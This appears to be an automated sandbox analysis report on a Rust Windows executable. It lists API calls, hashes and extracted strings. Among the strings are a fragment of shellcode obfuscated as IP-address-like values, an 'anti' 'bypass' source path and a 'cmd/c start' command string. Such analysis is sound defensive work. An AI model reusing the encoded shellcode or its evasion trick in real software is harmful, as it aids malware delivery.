                                      • Opcode ID: ce14058a8acbd09b3979ace38569a44abc07a0a54747e84948ad0dd79d44fb84
                                      • Instruction ID: ba92f5d10c4fd0cd96eef23c5e0db7ed33c26e41ab1156d34e94540bbf72ac85
                                      • Opcode Fuzzy Hash: ce14058a8acbd09b3979ace38569a44abc07a0a54747e84948ad0dd79d44fb84
                                      • Instruction Fuzzy Hash: 4861EA21B0C24542F671AF16D984BBEAAB0AF457A0FC4013ADE9D276D4DE3DD844CB61

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                      • String ID: main
                                      • API String ID: 3663057573-3207122276
                                      • Opcode ID: 51943ae258cae9eb5cc6b9ba16fba8e201f35c60dc68db3363a18acbdffd4609
                                      • Instruction ID: ba2084984ff0f7d330943acc6c72c009f37df5ef04bcede22c9c9f2a2af3f1d2
                                      • Opcode Fuzzy Hash: 51943ae258cae9eb5cc6b9ba16fba8e201f35c60dc68db3363a18acbdffd4609
                                      • Instruction Fuzzy Hash: FB614E32A04A4185EB40EF5AD8C03AC77B0FB49764FD4823AD99C633A4DF7C9585C760

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: memmovestrlen
                                      • String ID: cmd/ccalled `Option::unwrap()` on a `None` value$start
                                      • API String ID: 3405231851-2956442273
                                      • Opcode ID: aa2bc6b55a83bf6b09b9fe5ccb2b07714f5f5da40d931208fd8a12dbd3386655
                                      • Instruction ID: 793a72356d13cf2a82fa465bbb3c2a459e76ec90182decf3e349b2258cf752f1
                                      • Opcode Fuzzy Hash: aa2bc6b55a83bf6b09b9fe5ccb2b07714f5f5da40d931208fd8a12dbd3386655
                                      • Instruction Fuzzy Hash: CD51B562605BC154EB70AF2AD8857EC6721FB54798FC08136DE4D6BA99DF28D289C310

                                      Strings
                                      Similarity
                                      • API ID: CloseHandle$memmove
                                      • String ID: called `Result::unwrap()` on an `Err` value$curlip.sbbypass\anti\src\lib.rs
                                      • API String ID: 3228343985-4197622328
                                      • Opcode ID: 545fbd9f6fd30686cdb4edb0937e437c3d3e20a67197cde60f817635b9441185
                                      • Instruction ID: 92fc8f3fb6d4d3ef0fad430543660eec10c0852d8223dc75b81826aac4f0184e
                                      • Opcode Fuzzy Hash: 545fbd9f6fd30686cdb4edb0937e437c3d3e20a67197cde60f817635b9441185
                                      • Instruction Fuzzy Hash: 6AB19222A04BC584EB21AF6ED8813EDB360FF55798F844236DE9D3AA95DF38D245C350

                                      APIs
                                      Similarity
                                      • API ID: ErrorFileLastRead
                                      • String ID:
                                      • API String ID: 1948546556-0
                                      • Opcode ID: 5ecbb810fc304ec23de16c7c625d7a6246dba0ef6827bdf1a41db09a6f84a1ec
                                      • Instruction ID: 7b301c0562c43649a932b3d7578b1caa7b37910acb6a300d04919b728e73bf75
                                      • Opcode Fuzzy Hash: 5ecbb810fc304ec23de16c7c625d7a6246dba0ef6827bdf1a41db09a6f84a1ec
                                      • Instruction Fuzzy Hash: 3C41813270974581EB68AF2AE4803BDA7A1EB45B84FD4443ADA5D977D4CF3DE490C720

                                      Similarity
                                      • API ID: File$CreateErrorHandleInformationLast
                                      • String ID:
                                      • API String ID: 3280377019-0
                                      • Opcode ID: 3ee0296b2cb179a6af9dcf14ba0595089c0eb5be205ba48ddf88a4e20561c05c
                                      • Instruction ID: dbf4162bebe56185aac3a3174ce50bac337b852fdae519f4208889c057f4aa34
                                      • Opcode Fuzzy Hash: 3ee0296b2cb179a6af9dcf14ba0595089c0eb5be205ba48ddf88a4e20561c05c
                                      • Instruction Fuzzy Hash: C131B622F186559AF711EFAAE8447AD6770BB447A8FC44536DE4C22B94CF3CD186C310

                                      APIs
                                        • Part of subcall function 00007FF7D4343F70: CancelIo.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF7D43329CD), ref: 00007FF7D4343F9C
                                        • Part of subcall function 00007FF7D4343F70: GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF7D43329CD), ref: 00007FF7D4343FBE
                                      • CloseHandle.KERNELBASE(?,?,00000000,?,?,00007FF7D4343AD3), ref: 00007FF7D43329DC
                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF7D4343AD3), ref: 00007FF7D43329E2
                                      Similarity
                                      • API ID: CloseHandle$CancelOverlappedResult
                                      • String ID:
                                      • API String ID: 3064327366-0
                                      • Opcode ID: 449e392ad8b4cab362e3c14d2863a26b2d06bc48f358e9735b842bfa8f8402b3
                                      • Instruction ID: 81ff71836ed2eb613c1c7bdbab35010071f2d279668dee7c3c5bb64a83f3e03c
                                      • Opcode Fuzzy Hash: 449e392ad8b4cab362e3c14d2863a26b2d06bc48f358e9735b842bfa8f8402b3
                                      • Instruction Fuzzy Hash: 7AE06D26B24B6596E720AB66E9405AC6730BB847F0F504736DF7D23BD8CF34E4628720
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7D4348B01
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: d7e1c8bbf559339db21ccdcf0e93c2523246a71008db3d7c1647071cb9d6d139
                                      • Instruction ID: 7e199ec7a51134d0ecba1cab4ba9385bf08399320ba9a54b083b9eb6c7794b1d
                                      • Opcode Fuzzy Hash: d7e1c8bbf559339db21ccdcf0e93c2523246a71008db3d7c1647071cb9d6d139
                                      • Instruction Fuzzy Hash: F4219572A08B8182E6559F09F5803BEE360FF943D0F948235E7CD16AA4DF3CD5458700
                                      APIs
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D432DE05), ref: 00007FF7D43386E9
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 54aa6f87487bae02c1bcd4deae3fcd98bce8bc8ffe17e65ba92b29f21d3508a3
                                      • Instruction ID: 385b2cf7a57b4c486cf45829f4718d5147b2127e52855541661fa650c90a7e56
                                      • Opcode Fuzzy Hash: 54aa6f87487bae02c1bcd4deae3fcd98bce8bc8ffe17e65ba92b29f21d3508a3
                                      • Instruction Fuzzy Hash: B7F06823F1861542FA15AF9AE98536D92947F44B98FC40437DE4D66754CF3CE1C28211
                                      APIs
                                      Similarity
                                      • API ID: CloseHandle$FileObjectSingleWaitWrite
                                      • String ID:
                                      • API String ID: 1197516534-0
                                      • Opcode ID: ac7523652c1a9ed54011a6fe966dd85e651e47d7a99329cb94beb36c4bbd6dde
                                      • Instruction ID: 885abafdaab91ed89bd2bed5eaa18a9701e48d69c434c707e7fb84d5aa9d1b09
                                      • Opcode Fuzzy Hash: ac7523652c1a9ed54011a6fe966dd85e651e47d7a99329cb94beb36c4bbd6dde
                                      • Instruction Fuzzy Hash: 75F06263B1461086F715EF6AE8953AE6264BB40B98F80043ADE0D27754CF3CE1D28210
                                      APIs
                                      Similarity
                                      • API ID: CloseCryptCurrentHandleProcessRandom
                                      • String ID:
                                      • API String ID: 837579515-0
                                      • Opcode ID: f1d5dfea6900067569ec1c231c8e48ae001120cc24dc752beeb047049223b3ef
                                      • Instruction ID: 187a7338f51465418511c4d976c30f26bcffe1ee5d1a653592568dce7c1cf401
                                      • Opcode Fuzzy Hash: f1d5dfea6900067569ec1c231c8e48ae001120cc24dc752beeb047049223b3ef
                                      • Instruction Fuzzy Hash: B0F0BE36A0950182E719AF2ED9803ECE251EB05BA4FC80036DF4C67AD4CF7CE8E19350
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ErrorLast$AddressCaptureContextCurrentDirectoryEntryFunctionLibraryLoadLookupObjectProcSingleWaitmemset
                                      • String ID: EnumerateLoadedModulesW64$SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymQueryInlineTrace$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll$internal error: entered unreachable code/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\vec\mod.rs$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                      • API String ID: 2237928666-3866678080
                                      • Opcode ID: 2e0697ca662406930e799439386a56be8149fb00d7aadfcf2c859596d334c49c
                                      • Instruction ID: 04f1568d55e5225db70218b4387a9f6f665c4213440ed21a4abc1eb59de7a4e0
                                      • Opcode Fuzzy Hash: 2e0697ca662406930e799439386a56be8149fb00d7aadfcf2c859596d334c49c
                                      • Instruction Fuzzy Hash: 4C926331A09AC199EB319F2AEC803ED77A4FB44799FC4013ADA4D6BB94DF399245C350
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: AddressProc$CurrentProcessmemset
                                      • String ID: ($($SymAddrIncludeInlineTrace$SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$SymQueryInlineTrace$X$X$called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                      • API String ID: 3017635649-3223535655
                                      • Opcode ID: 8992c0ac207b2bf095a1048dad7957f7d4498f68d30f6f66bb6674a7cb82d803
                                      • Instruction ID: 44d36bfd36c1399cce7b680a3796f63cd3c94e478aca8e5a6c6619295f8f64b0
                                      • Opcode Fuzzy Hash: 8992c0ac207b2bf095a1048dad7957f7d4498f68d30f6f66bb6674a7cb82d803
                                      • Instruction Fuzzy Hash: 4242AD21A08A8282FB35AF1EE8857FEA760FB84794FC1413ADA8D13794DE3DD145CB50
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: AddressErrorLastWait
                                      • String ID: Box<dyn Any>aborting due to panic at $RUST_BACKTRACEfailed to write the buffered data$full$internal error: entered unreachable code/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\vec\mod.rs$main
                                      • API String ID: 1574541344-3767916208
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memmove
                                      • String ID: 252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102.129.1$401$403$Invalid UTF-8 sequence$attempt to calculate the remainder with a divisor of zero$called `Result::unwrap()` on an `Err` value$cryp$cryp$cryp$cryp
                                      • API String ID: 2162964266-1709460868
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FullNamePath
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$\\?\\\?\UNC\
                                      • API String ID: 2482867836-482199288
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                                      • String ID: called `Result::unwrap()` on an `Err` value
                                      • API String ID: 3090192319-2333694755
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 313767242-0
                                      APIs
                                      Strings
                                      • NTDLL.DLL, xrefs: 00007FF7D43208F7
                                      • assertion failed: self.is_char_boundary(new_len)/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs, xrefs: 00007FF7D4320F46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: FormatHandleMessageModulememmovememset
                                      • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs
                                      • API String ID: 2025335819-1565840215
                                      APIs
                                      • InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF7D434957D
                                      • InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF7D434965A
                                      • UpdateProcThreadAttribute.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF7D43496BA
                                      Strings
                                      • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF7D43498EE, 00007FF7D4349908
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AttributeProcThread$InitializeList$Update
                                      • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                      • API String ID: 3806694049-556906072
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorFileObjectReadSingleStatusWait
                                      • String ID:
                                      • API String ID: 3583596364-0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                      • API String ID: 1475443563-487299250
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899core\src\fmt\mod.rs
                                      • API String ID: 1475443563-2454368799
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorHandleLast
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 2586478127-1397643090
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: punycode{-}0
                                      • API String ID: 2221118986-2450133883
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: punycode{-}0
                                      • API String ID: 2221118986-2450133883
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,(><&*@$called `Result::unwrap()` on an `Err` value
                                      • API String ID: 0-898078177
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value
                                      • API String ID: 0-1380848348
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memmovememset
                                      • String ID:
                                      • API String ID: 1288253900-0
                                      • Opcode ID: 66dabcd47092da837a605f4a481dfcd21eba1e379244336c7acd503d749ff5d8
                                      • Instruction ID: 460ba4cfccec2898c9916450731ed5daa2eab9221c8f47396ae66282e8f2e263
                                      • Opcode Fuzzy Hash: 66dabcd47092da837a605f4a481dfcd21eba1e379244336c7acd503d749ff5d8
                                      • Instruction Fuzzy Hash: 78029966D28FD941E223973968067FBAB10AFF7748F51E31BFEC831E15DB18A2019214
                                      APIs
                                      • memset.VCRUNTIME140(?,?,?,?,00000000,?,?,-00000008,?,00000000,00007FF7D432D020), ref: 00007FF7D435D898
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 776f5ae8c80b3e66ed5c2f7054bfa38d53dc4fa2bcb914b6d684b29f270d49ae
                                      • Instruction ID: 99d206684ab6e2035bfdbd115f4e3a107ac216cecfa1174677b61fff465a8bb3
                                      • Opcode Fuzzy Hash: 776f5ae8c80b3e66ed5c2f7054bfa38d53dc4fa2bcb914b6d684b29f270d49ae
                                      • Instruction Fuzzy Hash: 68F14752A0E6E585DB119F2E804017DAF60EB527A4F99C33ADFB8277C2DA3CD146D320
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 33333333$UUUUUUUU
                                      • API String ID: 0-3483174168
                                      • Opcode ID: c58ef647f76863410c87604685f555bae2d83ddaacc038b804bf6de1dc359f8d
                                      • Instruction ID: 9f65aa689f48d9da1cb3338e6f3165f74d93f4c1ad144cb72cf1e876bc014956
                                      • Opcode Fuzzy Hash: c58ef647f76863410c87604685f555bae2d83ddaacc038b804bf6de1dc359f8d
                                      • Instruction Fuzzy Hash: 2F91C783B581F003F7624B7D2D6656AEFA25406BD370DF452EED427A86C038CC2AE365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmp
